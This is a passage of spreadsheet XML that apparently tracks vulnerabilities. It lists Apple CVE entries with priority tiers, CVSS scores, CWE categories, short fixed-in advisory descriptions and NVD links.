          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. An app may be able to cause unexpected system termination or write kernel memory.</t>
        </is>
      </c>
      <c r="S1109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84523</t>
        </is>
      </c>
    </row>
    <row r="1110">
      <c r="A1110" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1110" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84534</t>
        </is>
      </c>
      <c r="D1110" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1110" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1110" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1110" s="5" t="inlineStr"/>
      <c r="H1110" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1110" s="5" t="inlineStr"/>
      <c r="J1110" s="5" t="inlineStr"/>
      <c r="K1110" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:visionos</t>
        </is>
      </c>
      <c r="L1110" s="5" t="inlineStr"/>
      <c r="M1110" s="5" t="inlineStr"/>
      <c r="N1110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1110" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1110" s="5" t="inlineStr"/>
      <c r="Q1110" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1110" s="5" t="inlineStr">
        <is>
          <t>A path handling issue was addressed with improved validation. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, visionOS 27. Extracting a maliciously crafted archive may allow an attacker to write arbitrary files.</t>
        </is>
      </c>
      <c r="S1110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84534</t>
        </is>
      </c>
    </row>
    <row r="1111">
      <c r="A1111" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1111" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84540</t>
        </is>
      </c>
      <c r="D1111" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1111" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1111" s="5" t="inlineStr"/>
      <c r="H1111" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1111" s="5" t="inlineStr"/>
      <c r="J1111" s="5" t="inlineStr"/>
      <c r="K1111" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1111" s="5" t="inlineStr"/>
      <c r="M1111" s="5" t="inlineStr"/>
      <c r="N1111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1111" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1111" s="5" t="inlineStr"/>
      <c r="Q1111" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1111" s="5" t="inlineStr">
        <is>
          <t>An authorization issue was addressed with improved state management. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to access sensitive user data.</t>
        </is>
      </c>
      <c r="S1111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84540</t>
        </is>
      </c>
    </row>
    <row r="1112">
      <c r="A1112" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1112" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84541</t>
        </is>
      </c>
      <c r="D1112" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1112" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1112" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1112" s="5" t="inlineStr"/>
      <c r="H1112" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1112" s="5" t="inlineStr"/>
      <c r="J1112" s="5" t="inlineStr"/>
      <c r="K1112" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1112" s="5" t="inlineStr"/>
      <c r="M1112" s="5" t="inlineStr"/>
      <c r="N1112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1112" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1112" s="5" t="inlineStr"/>
      <c r="Q1112" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1112" s="5" t="inlineStr">
        <is>
          <t>An input validation issue was addressed with improved input validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An application may be able to access restricted files.</t>
        </is>
      </c>
      <c r="S1112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84541</t>
        </is>
      </c>
    </row>
    <row r="1113">
      <c r="A1113" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1113" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84552</t>
        </is>
      </c>
      <c r="D1113" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1113" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1113" s="5" t="inlineStr"/>
      <c r="H1113" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1113" s="5" t="inlineStr"/>
      <c r="J1113" s="5" t="inlineStr"/>
      <c r="K1113" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos</t>
        </is>
      </c>
      <c r="L1113" s="5" t="inlineStr"/>
      <c r="M1113" s="5" t="inlineStr"/>
      <c r="N1113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1113" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1113" s="5" t="inlineStr"/>
      <c r="Q1113" s="5" t="inlineStr"/>
      <c r="R1113" s="5" t="inlineStr">
        <is>
          <t>The issue was addressed with improved memory handling. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to cause unexpected system termination.</t>
        </is>
      </c>
      <c r="S1113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84552</t>
        </is>
      </c>
    </row>
    <row r="1114">
      <c r="A1114" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1114" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84555</t>
        </is>
      </c>
      <c r="D1114" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1114" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1114" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1114" s="5" t="inlineStr"/>
      <c r="H1114" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1114" s="5" t="inlineStr"/>
      <c r="J1114" s="5" t="inlineStr"/>
      <c r="K1114" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1114" s="5" t="inlineStr"/>
      <c r="M1114" s="5" t="inlineStr"/>
      <c r="N1114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1114" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1114" s="5" t="inlineStr"/>
      <c r="Q1114" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R1114" s="5" t="inlineStr">
        <is>
          <t>An authorization issue was addressed with improved access control. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8. An app may be able to access sensitive user data.</t>
        </is>
      </c>
      <c r="S1114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84555</t>
        </is>
      </c>
    </row>
    <row r="1115">
      <c r="A1115" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1115" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84556</t>
        </is>
      </c>
      <c r="D1115" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1115" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1115" s="5" t="inlineStr"/>
      <c r="H1115" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1115" s="5" t="inlineStr"/>
      <c r="J1115" s="5" t="inlineStr"/>
      <c r="K1115" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1115" s="5" t="inlineStr"/>
      <c r="M1115" s="5" t="inlineStr"/>
      <c r="N1115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1115" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1115" s="5" t="inlineStr"/>
      <c r="Q1115" s="5" t="inlineStr"/>
      <c r="R1115" s="5" t="inlineStr">
        <is>
          <t>An authorization issue was addressed with improved access control. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to access sensitive user data.</t>
        </is>
      </c>
      <c r="S1115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84556</t>
        </is>
      </c>
    </row>
    <row r="1116">
      <c r="A1116" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1116" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84558</t>
        </is>
      </c>
      <c r="D1116" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1116" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1116" s="5" t="inlineStr"/>
      <c r="H1116" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1116" s="5" t="inlineStr"/>
      <c r="J1116" s="5" t="inlineStr"/>
      <c r="K1116" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1116" s="5" t="inlineStr"/>
      <c r="M1116" s="5" t="inlineStr"/>
      <c r="N1116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1116" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1116" s="5" t="inlineStr"/>
      <c r="Q1116" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R1116" s="5" t="inlineStr">
        <is>
          <t>A double free issue was addressed with improved memory management. This issue is fixed in macOS Golden Gate 27. An app may be able to cause unexpected system termination.</t>
        </is>
      </c>
      <c r="S1116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84558</t>
        </is>
      </c>
    </row>
    <row r="1117">
      <c r="A1117" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1117" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84569</t>
        </is>
      </c>
      <c r="D1117" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1117" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1117" s="5" t="inlineStr"/>
      <c r="H1117" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1117" s="5" t="inlineStr"/>
      <c r="J1117" s="5" t="inlineStr"/>
      <c r="K1117" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1117" s="5" t="inlineStr"/>
      <c r="M1117" s="5" t="inlineStr"/>
      <c r="N1117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1117" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1117" s="5" t="inlineStr"/>
      <c r="Q1117" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1117" s="5" t="inlineStr">
        <is>
          <t>An access issue was addressed with additional sandbox restrictions on the system pasteboards. This issue is fixed in macOS Golden Gate 27. An app may be able to access sensitive user data.</t>
        </is>
      </c>
      <c r="S1117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84569</t>
        </is>
      </c>
    </row>
    <row r="1118">
      <c r="A1118" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1118" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84576</t>
        </is>
      </c>
      <c r="D1118" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1118" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1118" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1118" s="5" t="inlineStr"/>
      <c r="H1118" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1118" s="5" t="inlineStr"/>
      <c r="J1118" s="5" t="inlineStr"/>
      <c r="K1118" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1118" s="5" t="inlineStr"/>
      <c r="M1118" s="5" t="inlineStr"/>
      <c r="N1118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1118" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1118" s="5" t="inlineStr"/>
      <c r="Q1118" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1118" s="5" t="inlineStr">
        <is>
          <t>This issue was addressed with improved checks. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to access sensitive user data.</t>
        </is>
      </c>
      <c r="S1118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84576</t>
        </is>
      </c>
    </row>
    <row r="1119">
      <c r="A1119" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1119" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84583</t>
        </is>
      </c>
      <c r="D1119" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1119" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1119" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1119" s="5" t="inlineStr"/>
      <c r="H1119" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1119" s="5" t="inlineStr"/>
      <c r="J1119" s="5" t="inlineStr"/>
      <c r="K1119" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L1119" s="5" t="inlineStr"/>
      <c r="M1119" s="5" t="inlineStr"/>
      <c r="N1119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1119" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1119" s="5" t="inlineStr"/>
      <c r="Q1119" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1119" s="5" t="inlineStr">
        <is>
          <t>A permissions issue was addressed with additional restrictions. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. A local app may be able to read a persistent account identifier.</t>
        </is>
      </c>
      <c r="S1119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84583</t>
        </is>
      </c>
    </row>
    <row r="1120">
      <c r="A1120" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1120" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84585</t>
        </is>
      </c>
      <c r="D1120" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1120" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1120" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1120" s="5" t="inlineStr"/>
      <c r="H1120" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1120" s="5" t="inlineStr"/>
      <c r="J1120" s="5" t="inlineStr"/>
      <c r="K1120" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1120" s="5" t="inlineStr"/>
      <c r="M1120" s="5" t="inlineStr"/>
      <c r="N1120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1120" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1120" s="5" t="inlineStr"/>
      <c r="Q1120" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R1120" s="5" t="inlineStr">
        <is>
          <t>A permissions issue was addressed with improved state management. This issue is fixed in macOS Golden Gate 27. An app may be able to access local network devices without user consent.</t>
        </is>
      </c>
      <c r="S1120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84585</t>
        </is>
      </c>
    </row>
    <row r="1121">
      <c r="A1121" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1121" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84589</t>
        </is>
      </c>
      <c r="D1121" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1121" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1121" s="5" t="inlineStr"/>
      <c r="H1121" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1121" s="5" t="inlineStr"/>
      <c r="J1121" s="5" t="inlineStr"/>
      <c r="K1121" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1121" s="5" t="inlineStr"/>
      <c r="M1121" s="5" t="inlineStr"/>
      <c r="N1121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1121" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1121" s="5" t="inlineStr"/>
      <c r="Q1121" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1121" s="5" t="inlineStr">
        <is>
          <t>A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Golden Gate 27. An app may be able to modify Privacy preferences.</t>
        </is>
      </c>
      <c r="S1121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84589</t>
        </is>
      </c>
    </row>
    <row r="1122">
      <c r="A1122" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1122" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84601</t>
        </is>
      </c>
      <c r="D1122" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1122" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1122" s="5" t="inlineStr"/>
      <c r="H1122" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1122" s="5" t="inlineStr"/>
      <c r="J1122" s="5" t="inlineStr"/>
      <c r="K1122" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1122" s="5" t="inlineStr"/>
      <c r="M1122" s="5" t="inlineStr"/>
      <c r="N1122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1122" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1122" s="5" t="inlineStr"/>
      <c r="Q1122" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1122" s="5" t="inlineStr">
        <is>
          <t>A permissions issue was addressed with improved state management. This issue is fixed in macOS Golden Gate 27. An app may be able to bypass Apple Intelligence security prompts.</t>
        </is>
      </c>
      <c r="S1122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84601</t>
        </is>
      </c>
    </row>
    <row r="1123">
      <c r="A1123" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1123" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84612</t>
        </is>
      </c>
      <c r="D1123" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1123" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1123" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1123" s="5" t="inlineStr"/>
      <c r="H1123" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1123" s="5" t="inlineStr"/>
      <c r="J1123" s="5" t="inlineStr"/>
      <c r="K1123" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L1123" s="5" t="inlineStr"/>
      <c r="M1123" s="5" t="inlineStr"/>
      <c r="N1123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1123" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1123" s="5" t="inlineStr"/>
      <c r="Q1123" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1123" s="5" t="inlineStr">
        <is>
          <t>An authorization issue was addressed with improved access control. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. An app may be able to read persistent device identifiers.</t>
        </is>
      </c>
      <c r="S1123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84612</t>
        </is>
      </c>
    </row>
    <row r="1124">
      <c r="A1124" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1124" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84617</t>
        </is>
      </c>
      <c r="D1124" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1124" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1124" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1124" s="5" t="inlineStr"/>
      <c r="H1124" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1124" s="5" t="inlineStr"/>
      <c r="J1124" s="5" t="inlineStr"/>
      <c r="K1124" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos</t>
        </is>
      </c>
      <c r="L1124" s="5" t="inlineStr"/>
      <c r="M1124" s="5" t="inlineStr"/>
      <c r="N1124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1124" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1124" s="5" t="inlineStr"/>
      <c r="Q1124" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1124" s="5" t="inlineStr">
        <is>
          <t>An authorization issue was addressed with improved state management. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27. An app may be able to access sensitive user data.</t>
        </is>
      </c>
      <c r="S1124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84617</t>
        </is>
      </c>
    </row>
    <row r="1125">
      <c r="A1125" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1125" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84624</t>
        </is>
      </c>
      <c r="D1125" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1125" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1125" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1125" s="5" t="inlineStr"/>
      <c r="H1125" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1125" s="5" t="inlineStr"/>
      <c r="J1125" s="5" t="inlineStr"/>
      <c r="K1125" s="5" t="inlineStr"/>
      <c r="L1125" s="5" t="inlineStr"/>
      <c r="M1125" s="5" t="inlineStr"/>
      <c r="N1125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1125" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1125" s="5" t="inlineStr"/>
      <c r="Q1125" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1125" s="5" t="inlineStr">
        <is>
          <t>A permissions issue was addressed with improved path validation. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, visionOS 27. A sandboxed app may be able to access restricted files.</t>
        </is>
      </c>
      <c r="S1125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84624</t>
        </is>
      </c>
    </row>
    <row r="1126">
      <c r="A1126" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1126" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84628</t>
        </is>
      </c>
      <c r="D1126" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1126" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
